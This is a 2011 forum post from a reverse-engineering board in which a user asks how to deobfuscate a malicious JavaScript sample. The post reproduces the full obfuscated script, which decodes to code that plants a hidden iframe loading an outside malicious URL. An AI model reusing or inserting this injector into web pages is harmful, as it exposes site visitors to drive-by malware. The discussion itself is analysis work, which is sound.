Exetools  

Go Back   Exetools > General > General Discussion
Reload this Page Deobfuscate Javascript, script can't be compiled
Register Forum Rules FAQ Calendar

Notices

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #6  
Old 12-31-2011, 04:05
bolzano_1989 bolzano_1989 is offline
Friend
  
Join Date: Dec 2011
Posts: 109
Rept. Given: 16
Rept. Rcvd 27 Times in 18 Posts
Thanks Given: 10
Thanks Rcvd at 194 Times in 66 Posts
bolzano_1989 Reputation: 27
Quote:
Originally Posted by STRELiTZIA View Post
Hello,
Attached, basic ways to deobfuscate js.
The js code injects a malicious hidden !frame which leads to malicious url.

Flash movie link:
PHP Code:
http://www.multiupload.com/AB5F46WGOR 
Regards.
I could follow your helpful tutorial.
Thank you very much for your dynamic analysis tutorial although this way gives us many vulnerabilities .
Could you give me a static analysis way to deobfuscate the Javascript code ?

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Quote:
Originally Posted by qkumba View Post
Just change the final e(s); to "WScript.echo(s)" and you'll see the code.
You can even run the script using cscript.exe and redirect the output to a file.
I follow your instruction, but:
If I put the following code into a .wsf (Windows Script File) and run it:
Code:
Object.prototype.qwe=function()
 {
   return String["fro"+'mCha'+'rCo'+'de'];
 };
 Object.prototype.asd="e";
 var s="";
 try
 {
   {
   }
   ['qwtqwt']();
 }
 catch(q)
 {
   r=1;
 }
 if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof
 {
 }
 .asd.vfr==='undefined')w=2;
 e=eval;
 m=[18/w,18/w,210/w,204/w,64/w,80/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,82/w,246/w,18/w,18/w,18/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,118/w,18/w,18/w,250/w,64/w,202/w,216/w,230/w,202/w,64/w,246/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,238/w,228/w,210/w,232/w,202/w,80/w,68/w,120/w,210/w,204/w,228/w,194/w,218/w,202/w,64/w,230/w,228/w,198/w,122/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,64/w,238/w,210/w,200/w,232/w,208/w,122/w,78/w,98/w,96/w,78/w,64/w,208/w,202/w,210/w,206/w,208/w,232/w,122/w,78/w,98/w,96/w,78/w,64/w,230/w,232/w,242/w,216/w,202/w,122/w,78/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,116/w,208/w,210/w,200/w,200/w,202/w,220/w,118/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,116/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,118/w,216/w,202/w,204/w,232/w,116/w,96/w,118/w,232/w,222/w,224/w,116/w,96/w,118/w,78/w,124/w,120/w,94/w,210/w,204/w,228/w,194/w,218/w,202/w,124/w,68/w,82/w,118/w,18/w,18/w,250/w,18/w,18/w,204/w,234/w,220/w,198/w,232/w,210/w,222/w,220/w,64/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,246/w,18/w,18/w,18/w,236/w,194/w,228/w,64/w,204/w,64/w,122/w,64/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,198/w,228/w,202/w,194/w,232/w,202/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,80/w,78/w,210/w,204/w,228/w,194/w,218/w,202/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,230/w,228/w,198/w,78/w,88/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,82/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,122/w,78/w,208/w,210/w,200/w,200/w,202/w,220/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,122/w,78/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,216/w,202/w,204/w,232/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,232/w,222/w,224/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,238/w,210/w,200/w,232/w,208/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,208/w,202/w,210/w,206/w,208/w,232/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,92/w,194/w,224/w,224/w,202/w,220/w,200/w,134/w,208/w,210/w,216/w,200/w,80/w,204/w,82/w,118/w,18/w,18/w,250/w];
 mm=
 {
 }
 .qwe();
 for(i=0;i<m.length;i++)if(
 {
 }
 .asd==='e')s+=mm(e("m"+"["+"i]")); 
 WScript.echo(s);
I will get the result:
Code:
Line: 29
Char: 12
Error: Invalid entity reference
Code: 8004000C
Source: Windows Script Host
If I put "WScript.echo(s);" to a html file with the obfuscated javascript code and open the html file with Firefox, I don't see the deobfuscated code.
Reply With Quote
 

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Similar Threads
Thread Thread Starter Forum Replies Last Post
Forum Posts Hider (Javascript) atom0s Source Code 0 12-21-2022 11:18
What is the best deobfuscate of net goku General Discussion 15 02-04-2012 17:04
DeObfuscate for .NET? backdoor General Discussion 6 12-30-2010 05:03


All times are GMT +8. The time now is 06:09.

Aaron's homepage - Top

Always Your Best Friend: Aaron, JMI, ahmadmansoor, ZeNiX, chessgod101
( Since 1998 )